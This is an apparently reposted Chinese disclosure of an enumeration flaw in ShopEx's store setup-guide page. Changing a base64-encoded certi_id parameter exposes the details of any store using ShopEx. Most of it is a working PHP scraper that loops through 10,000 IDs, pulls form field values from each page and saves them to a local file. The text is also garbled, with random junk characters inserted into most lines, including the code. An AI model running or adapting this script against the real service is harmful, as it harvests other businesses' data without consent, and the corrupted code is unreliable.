|
|
简要描述:
2 D4 s( i. c3 _ NShopEx某接口缺陷,可遍历所有网站
% \2 t% U5 K' A8 ?详细说明:- m% K$ O# J) S) H. r
问题出现在shopex 网店使用向导页面 * i4 N3 ?; {; N3 [! m2 W. j, @
# O) M) ~% | t% E4 S g0 Z6 o) }
) ?1 d3 g, q# @4 o+ S$ P
" r& Z b( Z7 w$ x
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
X6 g( V! N! C1 i) d# g9 Q$ o z
; g' V/ y8 Z6 D* U: U/ s* I, m$ ~# m8 s4 x' \
~$ U* ~$ F" i+ V0 Drefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
0 x" P5 B S8 G3 ~. U" P6 f4 s& \' F2 D0 j! ]8 J( s
; J9 M; g2 N( ]3 l' ?7 V8 O4 D. j
+ m9 Y+ K8 x) p" B我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
9 a1 F9 @: g C* a ?# m) l! h; g' F( W) {2 ?9 C* L
4 R! y% R- |; `8 Z, ]+ \4 D M5 ]: b
<?php. u/ q$ d) @( U8 R1 X
0 `: C4 i2 ~# I" g) g E
for ($i=1; $i < 10000; $i++) { //遍历
; B7 [' r2 P h1 r: f
/ m' U3 f7 l. L, A) T# M ShowshopExD($i);
! {0 v! {8 U0 p$ O$ Z0 _8 C& ]
- L( [/ a& a2 T1 S3 v* Z7 @3 @. K$ \ }* G. b( z# M. i
6 M0 ~! u3 z) g* ~) W; D- [ function ShowshopExD($cid) {9 S; G1 \) ^) p0 X
6 H/ L) K* v, l: a $url='http://guide.ecos.shopex.cn/step2.php';
L) j+ K. h. w0 P
1 O- ~7 c7 H5 P6 P' x* O1 U! s $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');7 m/ M* f3 `1 C4 L2 O9 o
2 \' b! {, j2 _8 ]8 T, J $url = $url.'?refer='.$refer;2 g# V$ f2 U2 V' l' W; \
& } U9 k9 X0 J" z! h
$ch = curl_init($url);
1 T" B* i/ U7 u- X" [2 B' f- ^$ d* H* D9 s* N4 P
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;2 Z" h) p3 r6 i1 E" M( `+ N
! B8 t" u9 T" P6 _. l curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;3 p: f8 c5 _& B" r8 Q+ V
* I. s! M9 {0 t9 O+ K7 \ $result = curl_exec($ch);8 f5 \7 a: m( n' P' E
9 T* ~4 h- f1 X5 j $result = mb_convert_encoding($result, "gb2312", "UTF-8");
- G3 c2 P7 @8 |6 g# g! U/ e% c, h: R7 R$ h8 E9 {$ I
if(strpos($result,$refer))
5 A, Z0 ~) t2 o: W
5 G- [& X$ N8 i9 b4 [ {
% e) _2 `% z5 w# z" E; d" f2 h1 u- D6 I
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件4 W( x& O% V0 J! {* D- e/ a% X3 L
9 D% a) S8 s/ w6 E. \3 q" C4 U preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);9 p- I+ u7 @$ a
* q3 W l4 e/ U/ `( Y3 p foreach ($value[1] as $key) {' `5 B* [& z4 r' s B( ]% F5 N( N
' y9 Z5 @0 O" D! w
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);, ~' X7 v& A* r( ^$ J* K
1 q8 f2 L* u, R; G/ T
echo $res[1][0].':'.$res[3][0]."\r\n";
8 O- ~: h: S7 M# J: @1 M/ P( \( U; O7 ]% \) j/ |
$col =$res[1][0].':'.$res[3][0]."\r\n"; 3 F1 K5 ^0 k1 @* d6 O& }5 ]
& ^* L: B* D4 j& a fwrite($fp, $col, strlen($col)); 4 n* U7 [2 \& S8 U& Z& F7 d; Z- I
/ B& b9 E& E( P
}0 J/ r* `4 M2 E# e' d( B
# g! Y) M* H5 u+ Q
echo '--------------------------------'."\r\n";( N4 Y3 z/ r0 z6 _( T% K1 `9 h, [
& u% N% b9 p5 d
fclose($fp); 0 N% ?& a6 Q% _! M: @
5 A; ]. a3 s' |. h t }" {6 D6 @! @ J7 Q' E; r7 @4 x
( g- P/ M5 I2 q; {
flush();
9 y" \5 ~* C) O/ P- I5 D- Z
5 S9 V. b3 G8 { curl_close($ch);
/ U% ^8 M2 g7 L1 A# L) \1 [& H
}0 S$ s) Y2 e% [/ ], L! P# v. W
4 C+ Y2 }# y) t( d9 z# E( \. W: |?>
- M& _- {. u0 h1 I" l漏洞证明:- p2 [" C# U* O c7 e2 T
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg/ S' {2 `9 H* t
refer换成其他加密方式* F2 I7 c% S2 h* d1 f
|
|